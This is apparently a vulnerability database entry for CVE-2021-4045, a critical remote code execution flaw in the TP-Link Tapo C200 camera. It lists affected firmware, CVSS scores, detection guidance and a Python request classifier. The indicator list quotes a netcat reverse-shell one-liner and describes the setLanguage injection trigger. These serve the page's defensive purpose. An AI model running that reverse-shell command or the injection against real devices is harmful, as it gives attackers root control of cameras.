CVE-2021-4045
published 2022-03-10

Priority: P191, critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW, EXPLOIT, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 72.84% (99.4th percentile)

TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.

Affected

2 ranges

Vendor    Product               Version range   Fixed in
tp-link   tapo_c200             1.15 – 1.15
tp-link   tapo_c200_firmware    <= 1.1.15

Detection & IOCs (extracted from sources)

port: 443
port: 1337
url: https://<victim>:443/
command: rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f
process: uhttpd
  • Detect HTTP POST requests to the root path (/) on port 443 of the camera containing a JSON body with method 'setLanguage' and a params.payload field — this is the exploit trigger for CVE-2021-4045.
  • Alert on shell metacharacter injection (semicolons, pipe characters, single quotes) inside the 'payload' parameter of a setLanguage JSON method call to the camera's HTTPS interface.
  • Monitor for outbound netcat (nc) reverse-shell connections originating from the camera process uhttpd, particularly to attacker-controlled hosts on port 1337.
  • Detect creation of a named pipe at /tmp/f on the camera filesystem, which is a strong indicator of reverse-shell staging activity associated with this exploit.
  • The vulnerable process (uhttpd) runs as root by default; any child process (e.g., /bin/sh) spawned by uhttpd should be treated as a high-severity anomaly.
  • The exploit uses verify=False (TLS certificate verification disabled), meaning the camera's self-signed certificate will not block exploitation; network-level TLS inspection may not reliably detect this traffic.
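
One way to turn the first two detection bullets into a check, as an added example (not code from this page or its sources). It assumes requests have already been decrypted, for instance by a TLS-terminating proxy in front of the camera; the function names, verdict labels and sample requests are constructed for illustration.

```python
import json
import re

# Characters the detection notes list as injection indicators:
# semicolon, pipe, single quote.
SHELL_META = re.compile(r"[;|']")


def classify_request(method, path, body):
    """Classify one decrypted HTTP request as 'ignore', 'suspicious' or 'alert'.

    The three verdict labels are an assumption of this example.
    """
    # Only POSTs to the root path match the trigger described above.
    if method.upper() != "POST" or path.split("?", 1)[0] != "/":
        return "ignore"
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return "ignore"  # not JSON, so not a setLanguage call
    if not isinstance(doc, dict) or doc.get("method") != "setLanguage":
        return "ignore"
    params = doc.get("params")
    payload = params.get("payload") if isinstance(params, dict) else None
    if payload is None:
        return "ignore"
    # Non-string payloads are re-serialised so nested values are inspected too.
    text = payload if isinstance(payload, str) else json.dumps(payload)
    # setLanguage + params.payload is the trigger shape; metacharacters escalate.
    return "alert" if SHELL_META.search(text) else "suspicious"


def scan(requests):
    """Classify a list of (method, path, body) tuples."""
    return [classify_request(*r) for r in requests]


# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("GET", "/", ""),
    ("POST", "/", '{"method":"constructedMethod","params":{}}'),
    ("POST", "/", '{"method":"setLanguage","params":{"payload":"en_US"}}'),
    ("POST", "/", '{"method":"setLanguage","params":{"payload":"x;constructed|sample"}}'),
    ("POST", "/", "not json"),
]

if __name__ == "__main__":
    for req, verdict in zip(SAMPLES, scan(SAMPLES)):
        print(verdict, req[0], req[1], req[2][:60])
```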

CVSS provenance

nvd         v3.1   9.8    CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0   10.0   CRITICAL   AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck          9.8    CRITICAL